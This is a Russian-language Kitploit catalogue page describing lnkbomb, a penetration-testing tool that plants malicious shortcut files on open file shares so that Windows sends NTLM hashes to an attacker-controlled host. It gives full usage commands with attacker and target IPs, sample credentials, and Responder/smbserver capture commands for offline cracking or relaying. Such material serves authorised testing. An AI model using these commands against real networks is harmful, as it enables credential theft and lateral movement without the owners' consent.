Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
lnkbomb — Вредоносный генератор ярлыков для сбора NTLM-хэшей из незащищенных файловых ресурсов. | Kitploit
Инструменты/GitHubGitHub/dievus/lnkbomb
Атаки на ПаролиЭксплуатацияЛатеральное перемещениеСбор информацииТестирование на ПроникновениеRed TeamingArchived
GitHubdievus/lnkbomb

lnkbomb

Вредоносный генератор ярлыков для сбора NTLM-хэшей из незащищенных файловых ресурсов.

Репозиторий
3636271 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Lnkbomb

ko-fi

Lnkbomb используется для загрузки вредоносных файлов ярлыков на небезопасные файловые ресурсы. Уязвимость существует из-за того, что Windows ищет файл значка для ассоциации с файлом ярлыка. Этот файл значка может быть направлен на машину специалиста по тестированию на проникновение, на которой запущен Responder или smbserver, для сбора хешей NTLMv1 или NTLMv2 (в зависимости от конфигурации целевой хост-машины). Затем тестировщик может попытаться взломать эти собранные хеши в автономном режиме с помощью такого инструмента, как Hashcat, или передать их такому инструменту, как ntlmrelayx, для дальнейшей эксплуатации.

Файл полезной нагрузки загружается непосредственно на небезопасный файл, указанный тестировщиком в командной строке. Тестировщик также указывает свой IP-адрес, который записывается в полезную нагрузку.

Версия 2.0 — это полная переработка инструмента с использованием библиотеки pysmb, что позволяет выполнять сброс полезной нагрузки как без аутентификации, так и с аутентификацией.

Использование Python

Установка Lnkbomb

Обратите внимание, что проект стабильно работает в Windows. В Linux могут возникнуть проблемы.

git clone https://github.com/dievus/lnkbomb.git

Перейдите в каталог lnkbomb и выполните:

python3 lnkbomb.py -h

Это выведет справку, содержащую следующие флаги:

-h, --help - Выводит список опций справки

-t, --target - Указывает целевой IP-адрес

-a, --attacker - Указывает IP-адрес атакующей машины тестировщика

-r, --recover - Используется для удаления полезной нагрузки после завершения тестирования (например, -r payloadname.url)

-w, --windows - Новая команда - требуется для установки соответствующих портов для общих ресурсов Windows

-l, --linux - Новая команда - требуется для установки соответствующих портов для общих ресурсов Linux

-n, --netbios - Новая команда - должно быть включено имя NetBIOS для целевых машин Windows

Примеры полных команд:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

Вам понадобится использовать такой инструмент, как Responder или smbserver, для захвата хеша NTLM.
responder -I eth0 -dwFP -v

или

smbserver.py . . -smb2support

Примечания

Пожалуйста, имейте в виду, что этот инструмент предназначен только для этичного хакинга и тестирования на проникновение. Я не одобряю никаких действий, включающих тестирование целей, на которое у вас нет разрешения.

Этот инструмент может работать или не работать в зависимости от установленных обновлений и версии цели. Пользовательский опыт может различаться.

Я знаю, что это ярлыки .url, а не расширения .lnk. Я делаю это, чтобы вас позлить.

Скачать инструмент